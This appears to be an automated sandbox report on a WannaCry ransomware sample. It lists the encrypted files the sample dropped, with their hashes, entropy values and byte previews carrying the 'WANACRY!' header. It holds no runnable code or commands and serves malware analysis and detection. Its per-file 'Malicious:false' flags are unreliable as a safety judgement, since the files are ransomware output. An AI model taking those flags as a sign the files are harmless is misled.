                                                                                      Preview:WANACRY!.....%&.-.k...j..KwsPv.Uz....9....5.......TDye .su}...$.l.slo_..(.+..d._;.....5='p.di..R..;..H....y.7s.F...;.....[.'@.x8{...iw9.!.y.......%..8.x.]...$.?/.+&.........7..z"3~..'.......8.H.a.]h..F..]...^H3.....<.v..>....}.:..o..W..|.R#k.d_.B..j.aI..V.R.....a.........s.........x0.-...y.^>..f{).`..v.V...r..G.o......I....-....^...."`_Z.o,...4..q./xDc..|..+>.UStN..T\/e............Q.S!d..rij:....ib..]*....I0.<.i..\W!..b..i.:b..3.O..XL.k..#K....5.QW.h7;$..j.Q. ^....?......D.....}}6.....[........^.&..&|.:;.eQ.....Ln..l7..KgS.....J..Ggw.Y@.@.B.v...Q./yX.7.......V...8l4.........x..t..-M.7.J....L....b.]...._...\.iz....m...H.1$................U4$}.#..S.}..x.n.e....c=....[{9....ZP...T.^_.....1..#.......m<..%..T...9.{.)...a...;..Tm.ra.t.n.....0}....o....C.S..... .v`..a....f..i.sA..[.....A...\?.o.V*j.u..... ....ap..$..v.?..Q............a$.]..V$J.\.<.wf.....7R....V.Ws^..y........7..T...s.o.. .....E..+iU."..|.....@4.W.l..@W....._.@+.W.SN...[.3.......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2696
                                                                                      Entropy (8bit):7.935797557151933
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bk/iQojWj8+BYskGKHgcypBxz/T8ZkfC3fr/Z6pWfzD43A+/vRvS0LTC8p:o/pSW1myHxz/TTMfF6YLcQiD
                                                                                      MD5:5048ADFEB0644508A78A1B5D63846C0B
                                                                                      SHA1:601B00734BD2E807D0F746FEFEF0B364EE9E3898
                                                                                      SHA-256:6ADDAE647F36C78F9CD9328DE1F54E008A6C7E11A6EA3DF622CB3F26B3611062
                                                                                      SHA-512:65AC0ED47730BEC7488A2FE5C7DCBB7E6798B463F923029356528E2A2818D1B0E0493B1FA4A76D5AE08A54360273CD327EDFA8A9BB74CBA8A73B4957FBB4175E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....%&.-.k...j..KwsPv.Uz....9....5.......TDye .su}...$.l.slo_..(.+..d._;.....5='p.di..R..;..H....y.7s.F...;.....[.'@.x8{...iw9.!.y.......%..8.x.]...$.?/.+&.........7..z"3~..'.......8.H.a.]h..F..]...^H3.....<.v..>....}.:..o..W..|.R#k.d_.B..j.aI..V.R.....a.........s.........x0.-...y.^>..f{).`..v.V...r..G.o......I....-....^...."`_Z.o,...4..q./xDc..|..+>.UStN..T\/e............Q.S!d..rij:....ib..]*....I0.<.i..\W!..b..i.:b..3.O..XL.k..#K....5.QW.h7;$..j.Q. ^....?......D.....}}6.....[........^.&..&|.:;.eQ.....Ln..l7..KgS.....J..Ggw.Y@.@.B.v...Q./yX.7.......V...8l4.........x..t..-M.7.J....L....b.]...._...\.iz....m...H.1$................U4$}.#..S.}..x.n.e....c=....[{9....ZP...T.^_.....1..#.......m<..%..T...9.{.)...a...;..Tm.ra.t.n.....0}....o....C.S..... .v`..a....f..i.sA..[.....A...\?.o.V*j.u..... ....ap..$..v.?..Q............a$.]..V$J.\.<.wf.....7R....V.Ws^..y........7..T...s.o.. .....E..+iU."..|.....@4.W.l..@W....._.@+.W.SN...[.3.......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1864
                                                                                      Entropy (8bit):7.893604363093396
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bk0kkkrjGCF2GhUixJLraUz6xd4W3sdNSqeim8GF7Ht95O6fP:oV5FF2caXxemsRmTt7Ln
                                                                                      MD5:36FE6EFF844BD7F39ADED77DCF862171
                                                                                      SHA1:F7B5C4AF1F9466A72C80777F302FD86C1E75BFCB
                                                                                      SHA-256:3E40A869204F2BB817E9AFB1DC2595AFDB05C28A4C4371CD4E8EBC0EE1F74199
                                                                                      SHA-512:5775F212449C3F4B7DBC7637C6C335A0E5E9B57AA114A64623BF2CB8FBDDA2508E9609060C889348D66301ADCC19AC282AAFE0462BDFAC6362D80B6D03F597CD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....m).p...;zu.K....K.*ZX"e...Q.[..~n5....H...6.....Z.s>..%A..9.r.+.^..............w.....;_lFCbh.."h.....Bg.........j.u....$.#A}.....e.>d...5..D>.C.f.+#....D.@V9D....L.........XFA.........,.U.. ....._....v...2.!F!.2'.........1.i......wc......Io....).......`.X..nA.x..E.P.J..P....du...4.....w_..*.q#s..W.e.l..u.Oj....3.+J.;Z-Zm.\....R.m.....K...p..A.:$....j..;...IG..j...H<*(...=..(.........#.|<.....Lbu}g.a,.u..1.*..U..s.C.c...'...B..4..m..".r.2...V.CM}Zh4Na.B..}.Ek........y5.a....E..!:...L\...-...s.7!2.....~Wtq<....;E.6y..w..r.|..SI>..8h...V...LQl..-...8..7...}v...>.j..X.s.H.%..DH.2U4....+.V0.tP..I.........F}..0.&.L.3>D...tl....\.(............Yg.@y.X........Rg..0........B...e...s..Qnzy.7..Qgp/...l...CXF.....x.x......O..+X.Lz22.7.c...Q|.[..T.`).....j.7.3Q..h..q\....q)..,...O...g.d.!z}gU..........%\...P.....x..nI....@.Z.qx9........`.......o#Z... Y\.....#N.yz....f.I.Y2xYX..X.xh.I98.......2.....q..K..].....;.wr.NfN...|..e1.......nC
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1864
                                                                                      Entropy (8bit):7.893604363093396
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bk0kkkrjGCF2GhUixJLraUz6xd4W3sdNSqeim8GF7Ht95O6fP:oV5FF2caXxemsRmTt7Ln
                                                                                      MD5:36FE6EFF844BD7F39ADED77DCF862171
                                                                                      SHA1:F7B5C4AF1F9466A72C80777F302FD86C1E75BFCB
                                                                                      SHA-256:3E40A869204F2BB817E9AFB1DC2595AFDB05C28A4C4371CD4E8EBC0EE1F74199
                                                                                      SHA-512:5775F212449C3F4B7DBC7637C6C335A0E5E9B57AA114A64623BF2CB8FBDDA2508E9609060C889348D66301ADCC19AC282AAFE0462BDFAC6362D80B6D03F597CD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....m).p...;zu.K....K.*ZX"e...Q.[..~n5....H...6.....Z.s>..%A..9.r.+.^..............w.....;_lFCbh.."h.....Bg.........j.u....$.#A}.....e.>d...5..D>.C.f.+#....D.@V9D....L.........XFA.........,.U.. ....._....v...2.!F!.2'.........1.i......wc......Io....).......`.X..nA.x..E.P.J..P....du...4.....w_..*.q#s..W.e.l..u.Oj....3.+J.;Z-Zm.\....R.m.....K...p..A.:$....j..;...IG..j...H<*(...=..(.........#.|<.....Lbu}g.a,.u..1.*..U..s.C.c...'...B..4..m..".r.2...V.CM}Zh4Na.B..}.Ek........y5.a....E..!:...L\...-...s.7!2.....~Wtq<....;E.6y..w..r.|..SI>..8h...V...LQl..-...8..7...}v...>.j..X.s.H.%..DH.2U4....+.V0.tP..I.........F}..0.&.L.3>D...tl....\.(............Yg.@y.X........Rg..0........B...e...s..Qnzy.7..Qgp/...l...CXF.....x.x......O..+X.Lz22.7.c...Q|.[..T.`).....j.7.3Q..h..q\....q)..,...O...g.d.!z}gU..........%\...P.....x..nI....@.Z.qx9........`.......o#Z... Y\.....#N.yz....f.I.Y2xYX..X.xh.I98.......2.....q..K..].....;.wr.NfN...|..e1.......nC
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1848
                                                                                      Entropy (8bit):7.895760698635634
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bknSD7QzmeiB4J4dNdZQdytd4FFx5y4S40J5:oSYzmeiGJ4dSdyb8jg42
                                                                                      MD5:96508850D874AAABD8A3338A5D8F8053
                                                                                      SHA1:F7695DA48ADE2AD6FA2522A98FF3E7E782B8CEF4
                                                                                      SHA-256:D54D2B72266786DAE64FB1FC41620A1C42843B8511E2D4EF8C6F4E90EE9E1054
                                                                                      SHA-512:72E3F9C5390E8D1364E0B811FA58F2C636D56EF738EEA7E29B5EFF1EC550AE8E7F8EA673C8D120FBF74A38B35D2B7BDB91C930F9017D797A0B4A98EE31F33F8A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....Jf~9..z..c..Cf.7[.....[....':......A\h....V.ce..]....xR.S.....l%Lw....._o..>..J...z_....hc.D.()c>]....E.4.=x......'M..z1v).:.hW.1T.....~..C.....%.,..Ru.....lf.........../...;SE.>.I..%...*..,.Z.AFG{..!!.e..!).w.~..:.kb........M|D.xP..Qk6FQ.h..-Zk..............`s....@|jG......R....R....u..".Y.#...&..w.+t`w-.....D,......p..X.|y..v....../....T.ws.+m..g...`.T.{.p.8z.n@><r..R9.Yy....S..FV?.f<..Y.~..x..`I.C.Q............. .D._c`.....W~M(...QXj.+.w........]...t...W:...R.....7.S.....9....7...S......L]B....i........)..iS.x3X.l..U..+....DI...^j....w.H.... .(..J.Vz..{B'Y.3.T.Q.....%.Z*.!..O...@Z...]z...H...tn.....G...!.[.x....;.....d.o....P\...>!08..E.G=..wh..w..n...H..o.z..[5.).........B....o.G..a...1..oT../.G+..b..o..5..I..n....1........w.0.y~b4W...`....8.t.\....:...^.i...G.$ y/.......E.....6..B.y.C.6~..y?..xvj.k.......]...M.E_....N.K0.ceH..7...V...3..m. .SQ..d..U_..X^...`W...=J..p..,....j..4.....G....Z..*.&l..WM..(r.7.....(
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1848
                                                                                      Entropy (8bit):7.895760698635634
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bknSD7QzmeiB4J4dNdZQdytd4FFx5y4S40J5:oSYzmeiGJ4dSdyb8jg42
                                                                                      MD5:96508850D874AAABD8A3338A5D8F8053
                                                                                      SHA1:F7695DA48ADE2AD6FA2522A98FF3E7E782B8CEF4
                                                                                      SHA-256:D54D2B72266786DAE64FB1FC41620A1C42843B8511E2D4EF8C6F4E90EE9E1054
                                                                                      SHA-512:72E3F9C5390E8D1364E0B811FA58F2C636D56EF738EEA7E29B5EFF1EC550AE8E7F8EA673C8D120FBF74A38B35D2B7BDB91C930F9017D797A0B4A98EE31F33F8A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....Jf~9..z..c..Cf.7[.....[....':......A\h....V.ce..]....xR.S.....l%Lw....._o..>..J...z_....hc.D.()c>]....E.4.=x......'M..z1v).:.hW.1T.....~..C.....%.,..Ru.....lf.........../...;SE.>.I..%...*..,.Z.AFG{..!!.e..!).w.~..:.kb........M|D.xP..Qk6FQ.h..-Zk..............`s....@|jG......R....R....u..".Y.#...&..w.+t`w-.....D,......p..X.|y..v....../....T.ws.+m..g...`.T.{.p.8z.n@><r..R9.Yy....S..FV?.f<..Y.~..x..`I.C.Q............. .D._c`.....W~M(...QXj.+.w........]...t...W:...R.....7.S.....9....7...S......L]B....i........)..iS.x3X.l..U..+....DI...^j....w.H.... .(..J.Vz..{B'Y.3.T.Q.....%.Z*.!..O...@Z...]z...H...tn.....G...!.[.x....;.....d.o....P\...>!08..E.G=..wh..w..n...H..o.z..[5.).........B....o.G..a...1..oT../.G+..b..o..5..I..n....1........w.0.y~b4W...`....8.t.\....:...^.i...G.$ y/.......E.....6..B.y.C.6~..y?..xvj.k.......]...M.E_....N.K0.ceH..7...V...3..m. .SQ..d..U_..X^...`W...=J..p..,....j..4.....G....Z..*.&l..WM..(r.7.....(
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1400
                                                                                      Entropy (8bit):7.843757673288141
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkh56X3C0IEb5E9nyzK9CXzyHaYc/p2AKGOL7wt5nDEHPuvGnZxv2wsTEMIQhM:bkGXjjb5E1yzKEXz1/pYGOot5nDCuvwD
                                                                                      MD5:C60B8CA003E507CF13AC65D59DDFD12B
                                                                                      SHA1:77ED0179DBB8FF86E993E02A482B9D10FB9C25CB
                                                                                      SHA-256:DD602D688AB397CC6D8250FCC924EF96EE37F46AA2E3A88163B58D50940B7409
                                                                                      SHA-512:93D6B57DD68BF62CB4A0D5834C432923791176BF61B7E5BB697519D244559464976CA9C44D695618327963064FA0C9217C4014AA4319BD7A8EBE0D9D07C95F24
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....&L..f..oK.2..e.>$$..wquw...... .G..t%..`0Y..."..:.....Gq%...|q.......V..\.*..V...%.]&[.1..........O.!p...Y^vPJ.........+..+.5U>....F..`&.}`m.MCb....._..O.....,....Ct..hM.H.;.3.t[:.o.i.\..~P.<..H...}>.t.@.....T.......T.G.S>u.........'...d%`....Y.......!C>P......A.x.=L.....M....P.1.V+.I..m.X.G.4.....N........V.wg..q{...... .....L...r..~X..-......$C.nJ..oWUy....FW...8..Y....H..f.E...YiI.5..U..^:".W..i.E..r.......}...u....r...HC.i{..;d.....R..Y"7Q....k.6.....G.>B`...F.}.X...*T".%.H....U..Sx.D.J..HX....1..l.:.hLB..\e....D.^.w.i...!..\.Qv...).3..#~.*h.NS...S..j1.k3../..6V.`.+....&.....=../.!..g.n.-pQ.F.....i>@.(..g(m......_W......3.SVi....k:8.e..G`..`.%.%-.d..;.k-\T..QnKc`j..m*.dG&...}.....%\.gR..'r.s...i..Qzc.f...E.y0K,.3.E..P.....Z..........^.`.~.u....e*).KI....p..o....!F...Z8.*.jaV.....~b.,...7.2" ..\.j..r...H..F.Ve.r..K ....44...}.*..:9.......}.....nZDf.&g>V=l...K. ..1.....6.'....FIp..F...[M2W>A.~a)...oO<53d.8..$...\`\dR.~..]..T..$cs
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1400
                                                                                      Entropy (8bit):7.843757673288141
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkh56X3C0IEb5E9nyzK9CXzyHaYc/p2AKGOL7wt5nDEHPuvGnZxv2wsTEMIQhM:bkGXjjb5E1yzKEXz1/pYGOot5nDCuvwD
                                                                                      MD5:C60B8CA003E507CF13AC65D59DDFD12B
                                                                                      SHA1:77ED0179DBB8FF86E993E02A482B9D10FB9C25CB
                                                                                      SHA-256:DD602D688AB397CC6D8250FCC924EF96EE37F46AA2E3A88163B58D50940B7409
                                                                                      SHA-512:93D6B57DD68BF62CB4A0D5834C432923791176BF61B7E5BB697519D244559464976CA9C44D695618327963064FA0C9217C4014AA4319BD7A8EBE0D9D07C95F24
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....&L..f..oK.2..e.>$$..wquw...... .G..t%..`0Y..."..:.....Gq%...|q.......V..\.*..V...%.]&[.1..........O.!p...Y^vPJ.........+..+.5U>....F..`&.}`m.MCb....._..O.....,....Ct..hM.H.;.3.t[:.o.i.\..~P.<..H...}>.t.@.....T.......T.G.S>u.........'...d%`....Y.......!C>P......A.x.=L.....M....P.1.V+.I..m.X.G.4.....N........V.wg..q{...... .....L...r..~X..-......$C.nJ..oWUy....FW...8..Y....H..f.E...YiI.5..U..^:".W..i.E..r.......}...u....r...HC.i{..;d.....R..Y"7Q....k.6.....G.>B`...F.}.X...*T".%.H....U..Sx.D.J..HX....1..l.:.hLB..\e....D.^.w.i...!..\.Qv...).3..#~.*h.NS...S..j1.k3../..6V.`.+....&.....=../.!..g.n.-pQ.F.....i>@.(..g(m......_W......3.SVi....k:8.e..G`..`.%.%-.d..;.k-\T..QnKc`j..m*.dG&...}.....%\.gR..'r.s...i..Qzc.f...E.y0K,.3.E..P.....Z..........^.`.~.u....e*).KI....p..o....!F...Z8.*.jaV.....~b.,...7.2" ..\.j..r...H..F.Ve.r..K ....44...}.*..:9.......}.....nZDf.&g>V=l...K. ..1.....6.'....FIp..F...[M2W>A.~a)...oO<53d.8..$...\`\dR.~..]..T..$cs
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1736
                                                                                      Entropy (8bit):7.88675812799238
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bk/LN3vpN898QXR2mHAQasOoDBRtkXEumaO2BEICFBbIh6:o1v898svhBsXEu7O26I2N
                                                                                      MD5:12E64DAFCD34D65936C8FDC4B8712758
                                                                                      SHA1:B02FF0802A2827D11A65241D2A95D02D5A50A0B4
                                                                                      SHA-256:C79FE6B3C3EB39DDEC394D427B5F306C4B66660F800F890ADD5F12BF91033E6F
                                                                                      SHA-512:3EF4D0227F01F35F3429332DE2473E5D08C0AD76AE40AD03F8AA26E687065553F0CCA74B8F23F83CD3EE918BD26821B5BA1B73550E77A14F5D240BE0B7F4DC42
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....M..f.E[m.d.`..43.#...Pw...}...=....|..z..g@....g.R.h.N.+*...........F..9.yH. .......FC.$..,D......%.W..YTt(...|h..1...+\U.Rn?.9..t.Q](.:.ExT.(4.o.._&..'.x+.JN.B...&...<.X.{..55h|.............v..|.....Q1....W3.k.;c.......4_{!.`L....:..................e..d.(.6.m.ikV..C.Nt...#......b.4G.j....22....J....b)..B0.Us+ .......s.J@..[$.%...?......C.v.c...s-..k...X..I.EH...=...!...drO...O~>.+P...CbJl.a....D.e......M.v.u....?(.../z.(.hT............W......:.....i.,p.;.@B..b?dD...e..q..v......o)...=..X.R.G...G.n.W.c..!....'....e.L..K./jwvz`..F.M.....|e.:l..%..`...:...j$.V....y..8.)ko.."Q.y.....pP.2...r. T....X...nL.>.#$+......P..,...~S.?#..d.r..../..L.}...},d..A.]..n....Z.`A.........Y...v..z.|.#F|)..j...]...R.C..3...<;..=.5...JY(..k2MxBFbTP......A.....s.........7p.h..P..~..#.$^:..;$.>a ..4_..L.+.8 ..(@.........t..P........}...y..2.o4.?. ....m.0.<..t.g......h:^C##..QY....i.=^*A.m..i..p]A..H..g?...M..6G.'.4.....wxo..P...T.l;.h.n.].og.......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1736
                                                                                      Entropy (8bit):7.88675812799238
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bk/LN3vpN898QXR2mHAQasOoDBRtkXEumaO2BEICFBbIh6:o1v898svhBsXEu7O26I2N
                                                                                      MD5:12E64DAFCD34D65936C8FDC4B8712758
                                                                                      SHA1:B02FF0802A2827D11A65241D2A95D02D5A50A0B4
                                                                                      SHA-256:C79FE6B3C3EB39DDEC394D427B5F306C4B66660F800F890ADD5F12BF91033E6F
                                                                                      SHA-512:3EF4D0227F01F35F3429332DE2473E5D08C0AD76AE40AD03F8AA26E687065553F0CCA74B8F23F83CD3EE918BD26821B5BA1B73550E77A14F5D240BE0B7F4DC42
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....M..f.E[m.d.`..43.#...Pw...}...=....|..z..g@....g.R.h.N.+*...........F..9.yH. .......FC.$..,D......%.W..YTt(...|h..1...+\U.Rn?.9..t.Q](.:.ExT.(4.o.._&..'.x+.JN.B...&...<.X.{..55h|.............v..|.....Q1....W3.k.;c.......4_{!.`L....:..................e..d.(.6.m.ikV..C.Nt...#......b.4G.j....22....J....b)..B0.Us+ .......s.J@..[$.%...?......C.v.c...s-..k...X..I.EH...=...!...drO...O~>.+P...CbJl.a....D.e......M.v.u....?(.../z.(.hT............W......:.....i.,p.;.@B..b?dD...e..q..v......o)...=..X.R.G...G.n.W.c..!....'....e.L..K./jwvz`..F.M.....|e.:l..%..`...:...j$.V....y..8.)ko.."Q.y.....pP.2...r. T....X...nL.>.#$+......P..,...~S.?#..d.r..../..L.}...},d..A.]..n....Z.`A.........Y...v..z.|.#F|)..j...]...R.C..3...<;..=.5...JY(..k2MxBFbTP......A.....s.........7p.h..P..~..#.$^:..;$.>a ..4_..L.+.8 ..(@.........t..P........}...y..2.o4.?. ....m.0.<..t.g......h:^C##..QY....i.=^*A.m..i..p]A..H..g?...M..6G.'.4.....wxo..P...T.l;.h.n.].og.......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1352
                                                                                      Entropy (8bit):7.849450719870127
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkNiCQl6tijpRUECnw1jyTHNToaKHRNyrJOhqFIjnCTsAdmSdupZYWCngz:bkNAs429wcTHN8hNy9OwsAkSd8ZYwz
                                                                                      MD5:D3EFD7B11BC5F1A801CCD5C9AFC566D6
                                                                                      SHA1:456FFE30DCC491ECBB17199A01AED9C55BD17F52
                                                                                      SHA-256:2A85BD88F9EBD9AAEF0020064AB5566B2C03F30E42C88E1C49F7D02034CE5728
                                                                                      SHA-512:1D889F50930D52399F7B6FF1D5A1A863A6D33AC9246DED9313FA4999B3ABD5367559FB1635FC3C6BFD3060040A45ED53CEC8E6520AC9CFF21761C457434106AE
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....".....y.z.....wg.}.X-:..."....gY..~...P..5....^.<..=O.S.C.p..G[@....?....k.).G..aBF.0^....".... .......am...|Ka......C.vJRh1...V.8.]. ^...\u~....{p.A..CVU.T.z..\O?...}...l.....v.w..gR..B...*...S.D.....p...-.-vw..].n. ....E..(..W*.u..lV.....$......... .{V^..M.}Q,....x.ly..|.X...ct.mL...s..O..t0...!-.....EFXy`=A...~R..L..C...b....SxN.@0,:..'..9...`.M..2...}u..j....-}.x`..%...6r;H.~..e.F.........:....r..#-K.N..{C...W..n..>)..U..........V....=.+e.#a...O6H^...0.p`.L.l1..#._._2.c......@.%.2.-tX"w.2..:M....H.......Om...A..}r.\N.\.............i#.UW..p...n.w...k....RSh............Rm..Q....!Gr....]....L..@..q\....v...^;.U.....W.....Z..O.y...2XP..7......y>}.U.Ki-F..<.!.V......>T.s7.?.~#|......p..g.$Q.....H..3...3.....Q.7...?..HiD.8y.|D.P6..I........O.....S.0..F..+..i.....Z..hf....+@V..3>...X.Zf%.`..p...]f(..}A}...t.;.......J.N.{.....R.2.3.F5xS.i.m..>.E?..B..T....G.J......U...B.....m.l,.._z...3..f.....D.'.....q..0.eE:.i....@..N
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1352
                                                                                      Entropy (8bit):7.849450719870127
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkNiCQl6tijpRUECnw1jyTHNToaKHRNyrJOhqFIjnCTsAdmSdupZYWCngz:bkNAs429wcTHN8hNy9OwsAkSd8ZYwz
                                                                                      MD5:D3EFD7B11BC5F1A801CCD5C9AFC566D6
                                                                                      SHA1:456FFE30DCC491ECBB17199A01AED9C55BD17F52
                                                                                      SHA-256:2A85BD88F9EBD9AAEF0020064AB5566B2C03F30E42C88E1C49F7D02034CE5728
                                                                                      SHA-512:1D889F50930D52399F7B6FF1D5A1A863A6D33AC9246DED9313FA4999B3ABD5367559FB1635FC3C6BFD3060040A45ED53CEC8E6520AC9CFF21761C457434106AE
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....".....y.z.....wg.}.X-:..."....gY..~...P..5....^.<..=O.S.C.p..G[@....?....k.).G..aBF.0^....".... .......am...|Ka......C.vJRh1...V.8.]. ^...\u~....{p.A..CVU.T.z..\O?...}...l.....v.w..gR..B...*...S.D.....p...-.-vw..].n. ....E..(..W*.u..lV.....$......... .{V^..M.}Q,....x.ly..|.X...ct.mL...s..O..t0...!-.....EFXy`=A...~R..L..C...b....SxN.@0,:..'..9...`.M..2...}u..j....-}.x`..%...6r;H.~..e.F.........:....r..#-K.N..{C...W..n..>)..U..........V....=.+e.#a...O6H^...0.p`.L.l1..#._._2.c......@.%.2.-tX"w.2..:M....H.......Om...A..}r.\N.\.............i#.UW..p...n.w...k....RSh............Rm..Q....!Gr....]....L..@..q\....v...^;.U.....W.....Z..O.y...2XP..7......y>}.U.Ki-F..<.!.V......>T.s7.?.~#|......p..g.$Q.....H..3...3.....Q.7...?..HiD.8y.|D.P6..I........O.....S.0..F..+..i.....Z..hf....+@V..3>...X.Zf%.`..p...]f(..}A}...t.;.......J.N.{.....R.2.3.F5xS.i.m..>.E?..B..T....G.J......U...B.....m.l,.._z...3..f.....D.'.....q..0.eE:.i....@..N
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):11880
                                                                                      Entropy (8bit):7.982781570360385
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:P3cW5mL8Sb9g/8tjpK7jsRghYiyMctsyYR6Lb3VfT2txFIASCZO6GMLK2j8aHz:PMW5mLb5A7YghRIscF6DFbrLKOT
                                                                                      MD5:EB7B7D735C52A23787EC384D715343F5
                                                                                      SHA1:4E4F5CC89B024540D950C8F5E3CCF7AA3C082EC8
                                                                                      SHA-256:186622642B25FA666F8B791AD4A1D02504461501E624815968668097BE927A81
                                                                                      SHA-512:CFA2D72301C91DA239790808B8EB54741550B766212F31DB92A48672D76FC08B2910FB559D052714804CE9884934070CAFCE514291890DEE9411E5DC63340416
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....q5..]...L..[?|..l>....>Z..+.?g..{.d..5...+8.J%Ra:P>...ZGRh{...C....jr?LSy..Im,4...J...;(.$..T.x.....85........]..|...#...{..on.D.$l.$...0%[.g.Oj......E..!.b...*||H.U...nsO.!..K+...q....~c&.]\.%....\.F.M.v2.-....-....=:...z.`..X.....:..X....O-......~.|:.$,#1(....N.......[..W/.<......mE......H.#..U.......6..j .'`..k...ln...S.s.2...u....'-%.%....N[..d.....>..)..n4/;..N...,.[K..z!......;..fc..s.!..]..f...7..^....b...i....\-N....t.,...p.....V..M....d.~..#...D...../...[.0.O.^.......M*..2.t$.....!!.H."(..~.R.F.5..2|.....5xP.d......r..*..2..]f......".....A..,Y}.3........B..3..e.a..B..lc.fQ!f.....C.'i...~..)q/..{...\.1.o.....X..J..@p..y ./...Bu......Mf.u.;...>.....[..l...U.......WR..GT...m.=.H5}K.eB.i.c.|o....].O<q.....l.....iJ.-.x.#^.+...P.W')s.V...;6@%U..:...b..R.%..2..~....}...8.V"&.....t...:.../..?.!.z..Ug.....J.l..S}x.....r.....ON.......n.H5tp\MS..P....@.Y.x..w.g.j.a+...m.....}.Cc[3..-8Z........~.z....P.i../..n3c..w.5
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):11880
                                                                                      Entropy (8bit):7.982781570360385
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:P3cW5mL8Sb9g/8tjpK7jsRghYiyMctsyYR6Lb3VfT2txFIASCZO6GMLK2j8aHz:PMW5mLb5A7YghRIscF6DFbrLKOT
                                                                                      MD5:EB7B7D735C52A23787EC384D715343F5
                                                                                      SHA1:4E4F5CC89B024540D950C8F5E3CCF7AA3C082EC8
                                                                                      SHA-256:186622642B25FA666F8B791AD4A1D02504461501E624815968668097BE927A81
                                                                                      SHA-512:CFA2D72301C91DA239790808B8EB54741550B766212F31DB92A48672D76FC08B2910FB559D052714804CE9884934070CAFCE514291890DEE9411E5DC63340416
                                                                                      Malicious:false
                                                                                      Reputation:low
